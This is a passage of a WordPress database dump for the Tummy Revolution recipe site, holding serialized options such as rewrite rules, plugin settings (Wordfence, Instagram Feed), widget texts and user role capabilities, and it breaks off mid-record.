44:\"index.php?author_name=$matches[1]&embed=true\";s:35:\"author/([^/]+)/page/?([0-9]{1,})/?$\";s:51:\"index.php?author_name=$matches[1]&paged=$matches[2]\";s:17:\"author/([^/]+)/?$\";s:33:\"index.php?author_name=$matches[1]\";s:69:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/feed/(feed|rdf|rss|rss2|atom)/?$\";s:80:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&feed=$matches[4]\";s:64:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/(feed|rdf|rss|rss2|atom)/?$\";s:80:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&feed=$matches[4]\";s:45:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/embed/?$\";s:74:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&embed=true\";s:57:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/page/?([0-9]{1,})/?$\";s:81:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&paged=$matches[4]\";s:39:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/?$\";s:63:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]\";s:56:\"([0-9]{4})/([0-9]{1,2})/feed/(feed|rdf|rss|rss2|atom)/?$\";s:64:\"index.php?year=$matches[1]&monthnum=$matches[2]&feed=$matches[3]\";s:51:\"([0-9]{4})/([0-9]{1,2})/(feed|rdf|rss|rss2|atom)/?$\";s:64:\"index.php?year=$matches[1]&monthnum=$matches[2]&feed=$matches[3]\";s:32:\"([0-9]{4})/([0-9]{1,2})/embed/?$\";s:58:\"index.php?year=$matches[1]&monthnum=$matches[2]&embed=true\";s:44:\"([0-9]{4})/([0-9]{1,2})/page/?([0-9]{1,})/?$\";s:65:\"index.php?year=$matches[1]&monthnum=$matches[2]&paged=$matches[3]\";s:26:\"([0-9]{4})/([0-9]{1,2})/?$\";s:47:\"index.php?year=$matches[1]&monthnum=$matches[2]\";s:43:\"([0-9]{4})/feed/(feed|rdf|rss|rss2|atom)/?$\";s:43:\"index.php?year=$matches[1]&feed=$matches[2]\";s:38:\"([0-9]{4})/(feed|rdf|rss|rss2|atom)/?$\";s:43:\"index.php?year=$matches[1]&feed=$matches[2]\";s:19:\"([0-9]{4})/embed/?$\";s:37:\"index.php?year=$matches[1]&embed=true\";s:31:\"([0-9]{4})/page/?([0-9]{1,})/?$\";s:44:\"index.php?year=$matches[1]&paged=$matches[2]\";s:13:\"([0-9]{4})/?$\";s:26:\"index.php?year=$matches[1]\";s:27:\".?.+?/attachment/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:37:\".?.+?/attachment/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:57:\".?.+?/attachment/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:52:\".?.+?/attachment/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:52:\".?.+?/attachment/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:33:\".?.+?/attachment/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";s:16:\"(.?.+?)/embed/?$\";s:41:\"index.php?pagename=$matches[1]&embed=true\";s:20:\"(.?.+?)/trackback/?$\";s:35:\"index.php?pagename=$matches[1]&tb=1\";s:40:\"(.?.+?)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:47:\"index.php?pagename=$matches[1]&feed=$matches[2]\";s:35:\"(.?.+?)/(feed|rdf|rss|rss2|atom)/?$\";s:47:\"index.php?pagename=$matches[1]&feed=$matches[2]\";s:28:\"(.?.+?)/page/?([0-9]{1,})/?$\";s:48:\"index.php?pagename=$matches[1]&paged=$matches[2]\";s:35:\"(.?.+?)/comment-page-([0-9]{1,})/?$\";s:48:\"index.php?pagename=$matches[1]&cpage=$matches[2]\";s:24:\"(.?.+?)(?:/([0-9]+))?/?$\";s:47:\"index.php?pagename=$matches[1]&page=$matches[2]\";s:27:\"[^/]+/attachment/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:37:\"[^/]+/attachment/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:57:\"[^/]+/attachment/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:52:\"[^/]+/attachment/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:52:\"[^/]+/attachment/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:33:\"[^/]+/attachment/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";s:16:\"([^/]+)/embed/?$\";s:37:\"index.php?name=$matches[1]&embed=true\";s:20:\"([^/]+)/trackback/?$\";s:31:\"index.php?name=$matches[1]&tb=1\";s:40:\"([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:43:\"index.php?name=$matches[1]&feed=$matches[2]\";s:35:\"([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:43:\"index.php?name=$matches[1]&feed=$matches[2]\";s:28:\"([^/]+)/page/?([0-9]{1,})/?$\";s:44:\"index.php?name=$matches[1]&paged=$matches[2]\";s:35:\"([^/]+)/comment-page-([0-9]{1,})/?$\";s:44:\"index.php?name=$matches[1]&cpage=$matches[2]\";s:24:\"([^/]+)(?:/([0-9]+))?/?$\";s:43:\"index.php?name=$matches[1]&page=$matches[2]\";s:16:\"[^/]+/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:26:\"[^/]+/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:46:\"[^/]+/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:41:\"[^/]+/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:41:\"[^/]+/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:22:\"[^/]+/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";}','yes'),(321232,'wordfence_version','7.10.4','yes'),(321233,'wordfence_case','1','yes'),(321234,'wordfence_installed','1','yes'),(321235,'wordfenceActivated','1','yes'),(323989,'widget_mailmunch_widget','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(321236,'wf_plugin_act_error','','yes'),(320946,'sbi_statuses','a:8:{s:8:\"database\";a:1:{s:14:\"hashtag_column\";b:1;}s:13:\"first_install\";i:1693473469;s:4:\"gdpr\";a:1:{s:19:\"from_update_success\";b:1;}s:12:\"data_manager\";a:2:{s:9:\"last_used\";i:1693387069;s:14:\"num_db_updates\";i:31;}s:24:\"support_legacy_shortcode\";b:0;s:16:\"wizard_dismissed\";b:0;s:12:\"feed_locator\";a:2:{s:10:\"last_check\";i:1705656143;s:11:\"initialized\";i:1693473536;}s:30:\"unused_feed_warning_email_sent\";b:1;}','yes'),(320947,'sbi_usage_tracking','a:2:{s:7:\"enabled\";b:0;s:9:\"last_send\";i:0;}','yes'),(320949,'widget_instagram-feed-widget','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(320950,'sbi_usage_tracking_config','a:6:{s:3:\"day\";i:3;s:4:\"hour\";i:22;s:6:\"minute\";i:44;s:6:\"second\";i:22;s:6:\"offset\";i:341062;s:8:\"initsend\";i:1694040262;}','yes'),(320953,'sbi_rating_notice','pending','no'),(320954,'sbi_db_version','2.2','yes'),(320956,'sb_instagram_settings','a:58:{s:15:\"sb_instagram_at\";s:0:\"\";s:20:\"sb_instagram_user_id\";s:0:\"\";s:30:\"sb_instagram_preserve_settings\";s:0:\"\";s:23:\"sb_instagram_ajax_theme\";b:0;s:27:\"sb_instagram_disable_resize\";b:0;s:23:\"sb_instagram_cache_time\";i:1;s:28:\"sb_instagram_cache_time_unit\";s:5:\"hours\";s:16:\"sbi_caching_type\";s:10:\"background\";s:23:\"sbi_cache_cron_interval\";s:7:\"12hours\";s:19:\"sbi_cache_cron_time\";s:1:\"1\";s:20:\"sbi_cache_cron_am_pm\";s:2:\"am\";s:18:\"sb_instagram_width\";s:3:\"100\";s:23:\"sb_instagram_width_unit\";s:1:\"%\";s:28:\"sb_instagram_feed_width_resp\";b:0;s:19:\"sb_instagram_height\";s:0:\"\";s:16:\"sb_instagram_num\";s:2:\"20\";s:24:\"sb_instagram_height_unit\";s:0:\"\";s:17:\"sb_instagram_cols\";s:1:\"4\";s:27:\"sb_instagram_disable_mobile\";b:0;s:26:\"sb_instagram_image_padding\";s:1:\"5\";s:31:\"sb_instagram_image_padding_unit\";s:2:\"px\";s:17:\"sb_instagram_sort\";s:4:\"none\";s:23:\"sb_instagram_background\";s:0:\"\";s:21:\"sb_instagram_show_btn\";b:1;s:27:\"sb_instagram_btn_background\";s:0:\"\";s:27:\"sb_instagram_btn_text_color\";s:0:\"\";s:21:\"sb_instagram_btn_text\";s:12:\"Load More...\";s:22:\"sb_instagram_image_res\";s:4:\"auto\";s:30:\"sb_instagram_lightbox_comments\";b:1;s:25:\"sb_instagram_num_comments\";i:20;s:21:\"sb_instagram_show_bio\";b:1;s:27:\"sb_instagram_show_followers\";b:1;s:24:\"sb_instagram_show_header\";b:1;s:24:\"sb_instagram_header_size\";s:5:\"small\";s:25:\"sb_instagram_header_color\";s:0:\"\";s:20:\"sb_instagram_stories\";b:1;s:25:\"sb_instagram_stories_time\";i:5000;s:28:\"sb_instagram_show_follow_btn\";b:1;s:33:\"sb_instagram_folow_btn_background\";s:0:\"\";s:34:\"sb_instagram_follow_btn_text_color\";s:0:\"\";s:28:\"sb_instagram_follow_btn_text\";s:19:\"Follow on Instagram\";s:23:\"sb_instagram_custom_css\";s:0:\"\";s:22:\"sb_instagram_custom_js\";s:0:\"\";s:17:\"sb_instagram_cron\";s:2:\"no\";s:19:\"sb_instagram_backup\";b:1;s:15:\"sb_ajax_initial\";b:0;s:24:\"enqueue_css_in_shortcode\";b:0;s:18:\"enqueue_js_in_head\";b:0;s:24:\"disable_js_image_loading\";b:0;s:20:\"disable_admin_notice\";b:0;s:19:\"enable_email_report\";b:1;s:18:\"email_notification\";s:6:\"monday\";s:28:\"email_notification_addresses\";s:20:\"sara.chadwick@me.com\";s:30:\"sb_instagram_disable_mob_swipe\";b:0;s:28:\"sb_instagram_disable_awesome\";b:0;s:25:\"sb_instagram_disable_font\";b:0;s:4:\"gdpr\";s:4:\"auto\";s:18:\"connected_accounts\";a:0:{}}','yes'),(320955,'sb_instagram_errors','a:10:{s:10:\"connection\";a:0:{}s:7:\"hashtag\";a:0:{}s:8:\"resizing\";a:0:{}s:15:\"database_create\";a:0:{}s:10:\"upload_dir\";a:0:{}s:8:\"accounts\";a:0:{}s:9:\"error_log\";a:1:{i:0;s:274:\"09-13 09:23:31 - Your Instagram feed has been not viewed in the last 14 days. Due to Instagram data privacy rules, all data for this feed will be deleted in 7 days time. To avoid automated data deletion, simply view the Instagram feed on your website within the next 7 days.\";}s:10:\"action_log\";a:10:{i:151;s:43:\"01-17 21:20:32 - Deleted all platform data.\";i:152;s:48:\"01-17 21:20:32 - Deleted all connected accounts.\";i:153;s:43:\"01-18 09:20:34 - Deleted all platform data.\";i:154;s:48:\"01-18 09:20:34 - Deleted all connected accounts.\";i:155;s:43:\"01-18 21:18:45 - Deleted all platform data.\";i:156;s:48:\"01-18 21:18:45 - Deleted all connected accounts.\";i:157;s:43:\"01-19 09:22:23 - Deleted all platform data.\";i:158;s:48:\"01-19 09:22:23 - Deleted all connected accounts.\";i:159;s:43:\"01-19 21:19:55 - Deleted all platform data.\";i:160;s:48:\"01-19 21:19:55 - Deleted all connected accounts.\";}s:7:\"revoked\";a:0:{}s:11:\"unused_feed\";s:257:\"Your Instagram feed has been not viewed in the last 14 days. Due to Instagram data privacy rules, all data for this feed will be deleted in 7 days time. To avoid automated data deletion, simply view the Instagram feed on your website within the next 7 days.\";}','no'),(30,'hack_file','0','yes'),(31,'blog_charset','UTF-8','yes'),(32,'moderation_keys','','no'),(33,'active_plugins','a:8:{i:0;s:19:\"akismet/akismet.php\";i:1;s:36:\"contact-form-7/wp-contact-form-7.php\";i:2;s:33:\"instagram-feed/instagram-feed.php\";i:3;s:27:\"js_composer/js_composer.php\";i:4;s:23:\"mailmunch/mailmunch.php\";i:5;s:23:\"revslider/revslider.php\";i:6;s:20:\"select-core/main.php\";i:7;s:23:\"wordfence/wordfence.php\";}','yes'),(34,'category_base','','yes'),(35,'ping_sites','http://rpc.pingomatic.com/','yes'),(36,'comment_max_links','2','yes'),(37,'gmt_offset','0','yes'),(38,'default_email_category','1','yes'),(39,'recently_edited','a:5:{i:0;s:73:\"/home/tummmyov/tummyrevolution.com/wp-content/plugins/akismet/akismet.php\";i:1;s:73:\"/home/tummmyov/tummyrevolution.com/wp-content/themes/succulents/style.css\";i:2;s:74:\"/home/tummmyov/tummyrevolution.com/wp-content/themes/succulents/footer.php\";i:3;s:77:\"/home/tummmyov/tummyrevolution.com/wp-content/themes/succulents/functions.php\";i:4;s:0:\"\";}','no'),(40,'template','succulents','yes'),(41,'stylesheet','succulents','yes'),(312355,'finished_updating_comment_type','1','yes'),(44,'comment_registration','0','yes'),(45,'html_type','text/html','yes'),(46,'use_trackback','0','yes'),(47,'default_role','subscriber','yes'),(48,'db_version','56657','yes'),(49,'uploads_use_yearmonth_folders','1','yes'),(50,'upload_path','','yes'),(51,'blog_public','1','yes'),(52,'default_link_category','0','yes'),(53,'show_on_front','page','yes'),(54,'tag_base','','yes'),(55,'show_avatars','1','yes'),(56,'avatar_rating','G','yes'),(57,'upload_url_path','','yes'),(58,'thumbnail_size_w','150','yes'),(59,'thumbnail_size_h','150','yes'),(60,'thumbnail_crop','1','yes'),(61,'medium_size_w','300','yes'),(62,'medium_size_h','300','yes'),(63,'avatar_default','mystery','yes'),(64,'large_size_w','1024','yes'),(65,'large_size_h','1024','yes'),(66,'image_default_link_type','none','yes'),(67,'image_default_size','','yes'),(68,'image_default_align','','yes'),(69,'close_comments_for_old_posts','0','yes'),(70,'close_comments_days_old','14','yes'),(71,'thread_comments','1','yes'),(72,'thread_comments_depth','5','yes'),(73,'page_comments','0','yes'),(74,'comments_per_page','50','yes'),(75,'default_comments_page','newest','yes'),(76,'comment_order','asc','yes'),(77,'sticky_posts','a:0:{}','yes'),(78,'widget_categories','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(79,'widget_text','a:14:{i:2;a:4:{s:5:\"title\";s:0:\"\";s:4:\"text\";s:19:\"Quality since 1985.\";s:6:\"filter\";b:1;s:6:\"visual\";b:1;}i:3;a:4:{s:5:\"title\";s:8:\"About me\";s:4:\"text\";s:313:\"\"a\"\r\n\r\n \r\n\r\nIt is a long established fact that a reader will be distracted by the readable content of a page when looking at its layout and web page.\";s:6:\"filter\";b:1;s:6:\"visual\";b:1;}i:4;a:4:{s:5:\"title\";s:9:\"Follow me\";s:4:\"text\";s:0:\"\";s:6:\"filter\";b:1;s:6:\"visual\";b:1;}i:7;a:4:{s:5:\"title\";s:0:\"\";s:4:\"text\";s:50:\"Have any questions?\r\nPlease get in touch\r\n\r\n \";s:6:\"filter\";b:1;s:6:\"visual\";b:1;}i:8;a:4:{s:5:\"title\";s:0:\"\";s:4:\"text\";s:101:\"
Email us: info@tummyrevolution.com
\r\n \";s:6:\"filter\";b:1;s:6:\"visual\";b:1;}i:9;a:4:{s:5:\"title\";s:13:\"Our Instagram\";s:4:\"text\";s:74:\"Follow Tummy Revolution on Instagram for the latest recipes, news and tips\";s:6:\"filter\";b:1;s:6:\"visual\";b:1;}i:10;a:4:{s:5:\"title\";s:14:\"Our Newsletter\";s:4:\"text\";s:70:\"Sign up to our Newsletter and get special offers, new recipes and tips\";s:6:\"filter\";b:1;s:6:\"visual\";b:1;}i:12;a:4:{s:5:\"title\";s:0:\"\";s:4:\"text\";s:0:\"\";s:6:\"filter\";b:1;s:6:\"visual\";b:1;}i:13;a:4:{s:5:\"title\";s:0:\"\";s:4:\"text\";s:125:\"I’m Sara Chadwick, founder of ‘Tummy Revolution’ and long-term sufferer of digestive troubles and IBS related symptoms.\";s:6:\"filter\";b:1;s:6:\"visual\";b:1;}i:17;a:4:{s:5:\"title\";s:0:\"\";s:4:\"text\";s:0:\"\";s:6:\"filter\";b:1;s:6:\"visual\";b:1;}i:18;a:4:{s:5:\"title\";s:0:\"\";s:4:\"text\";s:101:\"© 2020 Tummy Revolution. All Rights Reserved\";s:6:\"filter\";b:1;s:6:\"visual\";b:1;}i:19;a:4:{s:5:\"title\";s:0:\"\";s:4:\"text\";s:183:\"\"\"\";s:6:\"filter\";b:1;s:6:\"visual\";b:1;}i:21;a:4:{s:5:\"title\";s:0:\"\";s:4:\"text\";s:125:\"I’m Sara Chadwick, founder of ‘Tummy Revolution’ and long-term sufferer of digestive troubles and IBS related symptoms.\";s:6:\"filter\";b:1;s:6:\"visual\";b:1;}s:12:\"_multiwidget\";i:1;}','yes'),(80,'widget_rss','a:2:{i:1;a:0:{}s:12:\"_multiwidget\";i:1;}','yes'),(81,'uninstall_plugins','a:8:{s:23:\"wpematico/wpematico.php\";s:19:\"wpematico_uninstall\";s:35:\"litespeed-cache/litespeed-cache.php\";s:47:\"LiteSpeed\\Activation::uninstall_litespeed_cache\";s:31:\"backup-backup/backup-backup.php\";s:21:\"bmi_uninstall_handler\";s:39:\"copy-delete-posts/copy-delete-posts.php\";a:2:{i:0;s:15:\"Account\\Account\";i:1;s:25:\"onUninstallPluginListener\";}s:48:\"php-compatibility-checker/wpengine-phpcompat.php\";s:28:\"WPEngine_PHPCompat\\uninstall\";s:45:\"enable-media-replace/enable-media-replace.php\";a:2:{i:0;s:33:\"\\EnableMediaReplace\\InstallHelper\";i:1;s:15:\"uninstallPlugin\";}s:28:\"migrate-guru/migrateguru.php\";a:2:{i:0;s:10:\"MGWPAction\";i:1;s:9:\"uninstall\";}s:33:\"instagram-feed/instagram-feed.php\";s:22:\"sb_instagram_uninstall\";}','no'),(82,'timezone_string','','yes'),(83,'page_for_posts','3776','yes'),(84,'page_on_front','1117','yes'),(85,'default_post_format','0','yes'),(86,'link_manager_enabled','0','yes'),(87,'finished_splitting_shared_terms','1','yes'),(88,'site_icon','5425','yes'),(89,'medium_large_size_w','768','yes'),(90,'medium_large_size_h','0','yes'),(91,'wp_page_for_privacy_policy','3','yes'),(92,'show_comments_cookies_opt_in','1','yes'),(93,'admin_email_lifespan','1707387521','yes'),(94,'initial_db_version','45805','yes'),(95,'wpvt_user_roles','a:7:{s:13:\"administrator\";a:2:{s:4:\"name\";s:13:\"Administrator\";s:12:\"capabilities\";a:133:{s:13:\"switch_themes\";b:1;s:11:\"edit_themes\";b:1;s:16:\"activate_plugins\";b:1;s:12:\"edit_plugins\";b:1;s:10:\"edit_users\";b:1;s:10:\"edit_files\";b:1;s:14:\"manage_options\";b:1;s:17:\"moderate_comments\";b:1;s:17:\"manage_categories\";b:1;s:12:\"manage_links\";b:1;s:12:\"upload_files\";b:1;s:6:\"import\";b:1;s:15:\"unfiltered_html\";b:1;s:10:\"edit_posts\";b:1;s:17:\"edit_others_posts\";b:1;s:20:\"edit_published_posts\";b:1;s:13:\"publish_posts\";b:1;s:10:\"edit_pages\";b:1;s:4:\"read\";b:1;s:8:\"level_10\";b:1;s:7:\"level_9\";b:1;s:7:\"level_8\";b:1;s:7:\"level_7\";b:1;s:7:\"level_6\";b:1;s:7:\"level_5\";b:1;s:7:\"level_4\";b:1;s:7:\"level_3\";b:1;s:7:\"level_2\";b:1;s:7:\"level_1\";b:1;s:7:\"level_0\";b:1;s:17:\"edit_others_pages\";b:1;s:20:\"edit_published_pages\";b:1;s:13:\"publish_pages\";b:1;s:12:\"delete_pages\";b:1;s:19:\"delete_others_pages\";b:1;s:22:\"delete_published_pages\";b:1;s:12:\"delete_posts\";b:1;s:19:\"delete_others_posts\";b:1;s:22:\"delete_published_posts\";b:1;s:20:\"delete_private_posts\";b:1;s:18:\"edit_private_posts\";b:1;s:18:\"read_private_posts\";b:1;s:20:\"delete_private_pages\";b:1;s:18:\"edit_private_pages\";b:1;s:18:\"read_private_pages\";b:1;s:12:\"delete_users\";b:1;s:12:\"create_users\";b:1;s:17:\"unfiltered_upload\";b:1;s:14:\"edit_dashboard\";b:1;s:14:\"update_plugins\";b:1;s:14:\"delete_plugins\";b:1;s:15:\"install_plugins\";b:1;s:13:\"update_themes\";b:1;s:14:\"install_themes\";b:1;s:11:\"update_core\";b:1;s:10:\"list_users\";b:1;s:12:\"remove_users\";b:1;s:13:\"promote_users\";b:1;s:18:\"edit_theme_options\";b:1;s:13:\"delete_themes\";b:1;s:6:\"export\";b:1;s:18:\"manage_woocommerce\";b:1;s:24:\"view_woocommerce_reports\";b:1;s:12:\"edit_product\";b:1;s:12:\"read_product\";b:1;s:14:\"delete_product\";b:1;s:13:\"edit_products\";b:1;s:20:\"edit_others_products\";b:1;s:16:\"publish_products\";b:1;s:21:\"read_private_products\";b:1;s:15:\"delete_products\";b:1;s:23:\"delete_private_products\";b:1;s:25:\"delete_published_products\";b:1;s:22:\"delete_others_products\";b:1;s:21:\"edit_private_products\";b:1;s:23:\"edit_published_products\";b:1;s:20:\"manage_product_terms\";b:1;s:18:\"edit_product_terms\";b:1;s:20:\"delete_product_terms\";b:1;s:20:\"assign_product_terms\";b:1;s:15:\"edit_shop_order\";b:1;s:15:\"read_shop_order\";b:1;s:17:\"delete_shop_order\";b:1;s:16:\"edit_shop_orders\";b:1;s:23:\"edit_others_shop_orders\";b:1;s:19:\"publish_shop_orders\";b:1;s:24:\"read_private_shop_orders\";b:1;s:18:\"delete_shop_orders\";b:1;s:26:\"delete_private_shop_orders\";b:1;s:28:\"delete_published_shop_orders\";b:1;s:25:\"delete_others_shop_orders\";b:1;s:24:\"edit_private_shop_orders\";b:1;s:26:\"edit_published_shop_orders\";b:1;s:23:\"manage_shop_order_terms\";b:1;s:21:\"edit_shop_order_terms\";b:1;s:23:\"delete_shop_order_terms\";b:1;s:23:\"assign_shop_order_terms\";b:1;s:16:\"edit_shop_coupon\";b:1;s:16:\"read_shop_coupon\";b:1;s:18:\"delete_shop_coupon\";b:1;s:17:\"edit_shop_coupons\";b:1;s:24:\"edit_others_shop_coupons\";b:1;s:20:\"publish_shop_coupons\";b:1;s:25:\"read_private_shop_coupons\";b:1;s:19:\"delete_shop_coupons\";b:1;s:27:\"delete_private_shop_coupons\";b:1;s:29:\"delete_published_shop_coupons\";b:1;s:26:\"delete_others_shop_coupons\";b:1;s:25:\"edit_private_shop_coupons\";b:1;s:27:\"edit_published_shop_coupons\";b:1;s:24:\"manage_shop_coupon_terms\";b:1;s:22:\"edit_shop_coupon_terms\";b:1;s:24:\"delete_shop_coupon_terms\";b:1;s:24:\"assign_shop_coupon_terms\";b:1;s:31:\"vc_access_rules_post_types/post\";b:1;s:31:\"vc_access_rules_post_types/page\";b:1;s:41:\"vc_access_rules_post_types/portfolio-item\";b:1;s:38:\"vc_access_rules_post_types/team-member\";b:1;s:34:\"vc_access_rules_post_types/product\";b:1;s:33:\"vc_access_rules_post_types/events\";b:1;s:26:\"vc_access_rules_post_types\";s:6:\"custom\";s:30:\"vc_access_rules_backend_editor\";b:1;s:29:\"vc_access_rules_post_settings\";b:1;s:24:\"vc_access_rules_settings\";b:1;s:25:\"vc_access_rules_templates\";b:1;s:26:\"vc_access_rules_shortcodes\";b:1;s:28:\"vc_access_rules_grid_builder\";b:1;s:23:\"vc_access_rules_presets\";b:1;s:25:\"vc_access_rules_dragndrop\";b:1;s:29:\"manage_instagram_feed_options\";b:1;s:23:\"wf2fa_activate_2fa_self\";b:1;s:25:\"wf2fa_activate_2fa_others\";b:1;s:21:\"wf2fa_manage_settings\";b:1;}}s:6:\"editor\";a:2:{s:4:\"name\";s:6:\"Editor\";s:12:\"capabilities\";a:42:{s:17:\"moderate_comments\";b:1;s:17:\"manage_categories\";b:1;s:12:\"manage_links\";b:1;s:12:\"upload_files\";b:1;s:15:\"unfiltered_html\";b:1;s:10:\"edit_posts\";b:1;s:17:\"edit_others_posts\";b:1;s:20:\"edit_published_posts\";b:1;s:13:\"publish_posts\";b:1;s:10:\"edit_pages\";b:1;s:4:\"read\";b:1;s:7:\"level_7\";b:1;s:7:\"level_6\";b:1;s:7:\"level_5\";b:1;s:7:\"level_4\";b:1;s:7:\"level_3\";b:1;s:7:\"level_2\";b:1;s:7:\"level_1\";b:1;s:7:\"level_0\";b:1;s:17:\"edit_others_pages\";b:1;s:20:\"edit_published_pages\";b:1;s:13:\"publish_pages\";b:1;s:12:\"delete_pages\";b:1;s:19:\"delete_others_pages\";b:1;s:22:\"delete_published_pages\";b:1;s:12:\"delete_posts\";b:1;s:19:\"delete_others_posts\";b:1;s:22:\"delete_published_posts\";b:1;s:20:\"delete_private_posts\";b:1;s:18:\"edit_private_posts\";b:1;s:18:\"read_private_posts\";b:1;s:20:\"delete_private_pages\";b:1;s:18:\"edit_private_pages\";b:1;s:18:\"read_private_pages\";b:1;s:26:\"vc_access_rules_post_types\";b:1;s:30:\"vc_access_rules_backend_editor\";b:1;s:29:\"vc_access_rules_post_settings\";b:1;s:25:\"vc_access_rules_templates\";b:1;s:26:\"vc_access_rules_shortcodes\";b:1;s:28:\"vc_access_rules_grid_builder\";b:1;s:23:\"vc_access_rules_presets\";b:1;s:25:\"vc_access_rules_dragndrop\";b:1;}}s:6:\"author\";a:2:{s:4:\"name\";s:6:\"Author\";s:12:\"capabilities\";a:18:{s:12:\"upload_files\";b:1;s:10:\"edit_posts\";b:1;s:20:\"edit_published_posts\";b:1;s:13:\"publish_posts\";b:1;s:4:\"read\";b:1;s:7:\"level_2\";b:1;s:7:\"level_1\";b:1;s:7:\"level_0\";b:1;s:12:\"delete_posts\";b:1;s:22:\"delete_published_posts\";b:1;s:26:\"vc_access_rules_post_types\";b:1;s:30:\"vc_access_rules_backend_editor\";b:1;s:29:\"vc_access_rules_post_settings\";b:1;s:25:\"vc_access_rules_templates\";b:1;s:26:\"vc_access_rules_shortcodes\";b:1;s:28:\"vc_access_rules_grid_builder\";b:1;s:23:\"vc_access_rules_presets\";b:1;s:25:\"vc_access_rules_dragndrop\";b:1;}}s:11:\"contributor\";a:2:{s:4:\"name\";s:11:\"Contributor\";s:12:\"capabilities\";a:13:{s:10:\"edit_posts\";b:1;s:4:\"read\";b:1;s:7:\"level_1\";b:1;s:7:\"level_0\";b:1;s:12:\"delete_posts\";b:1;s:26:\"vc_access_rules_post_types\";b:1;s:30:\"vc_access_rules_backend_editor\";b:1;s:29:\"vc_access_rules_post_settings\";b:1;s:25:\"vc_access_rules_templates\";b:1;s:26:\"vc_access_rules_shortcodes\";b:1;s:28:\"vc_access_rules_grid_builder\";b:1;s:23:\"vc_access_rules_presets\";b:1;s:25:\"vc_access_rules_dragndrop\";b:1;}}s:10:\"subscriber\";a:2:{s:4:\"name\";s:10:\"Subscriber\";s:12:\"capabilities\";a:2:{s:4:\"read\";b:1;s:7:\"level_0\";b:1;}}s:8:\"customer\";a:2:{s:4:\"name\";s:8:\"Customer\";s:12:\"capabilities\";a:1:{s:4:\"read\";b:1;}}s:12:\"shop_manager\";a:2:{s:4:\"name\";s:12:\"Shop manager\";s:12:\"capabilities\";a:100:{s:7:\"level_9\";b:1;s:7:\"level_8\";b:1;s:7:\"level_7\";b:1;s:7:\"level_6\";b:1;s:7:\"level_5\";b:1;s:7:\"level_4\";b:1;s:7:\"level_3\";b:1;s:7:\"level_2\";b:1;s:7:\"level_1\";b:1;s:7:\"level_0\";b:1;s:4:\"read\";b:1;s:18:\"read_private_pages\";b:1;s:18:\"read_private_posts\";b:1;s:10:\"edit_posts\";b:1;s:10:\"edit_pages\";b:1;s:20:\"edit_published_posts\";b:1;s:20:\"edit_published_pages\";b:1;s:18:\"edit_private_pages\";b:1;s:18:\"edit_private_posts\";b:1;s:17:\"edit_others_posts\";b:1;s:17:\"edit_others_pages\";b:1;s:13:\"publish_posts\";b:1;s:13:\"publish_pages\";b:1;s:12:\"delete_posts\";b:1;s:12:\"delete_pages\";b:1;s:20:\"delete_private_pages\";b:1;s:20:\"delete_private_posts\";b:1;s:22:\"delete_published_pages\";b:1;s:22:\"delete_published_posts\";b:1;s:19:\"delete_others_posts\";b:1;s:19:\"delete_others_pages\";b:1;s:17:\"manage_categories\";b:1;s:12:\"manage_links\";b:1;s:17:\"moderate_comments\";b:1;s:12:\"upload_files\";b:1;s:6:\"export\";b:1;s:6:\"import\";b:1;s:10:\"list_users\";b:1;s:18:\"edit_theme_options\";b:1;s:18:\"manage_woocommerce\";b:1;s:24:\"view_woocommerce_reports\";b:1;s:12:\"edit_product\";b:1;s:12:\"read_product\";b:1;s:14:\"delete_product\";b:1;s:13:\"edit_products\";b:1;s:20:\"edit_others_products\";b:1;s:16:\"publish_products\";b:1;s:21:\"read_private_products\";b:1;s:15:\"delete_products\";b:1;s:23:\"delete_private_products\";b:1;s:25:\"delete_published_products\";b:1;s:22:\"delete_others_products\";b:1;s:21:\"edit_private_products\";b:1;s:23:\"edit_published_products\";b:1;s:20:\"manage_product_terms\";b:1;s:18:\"edit_product_terms\";b:1;s:20:\"delete_product_terms\";b:1;s:20:\"assign_product_terms\";b:1;s:15:\"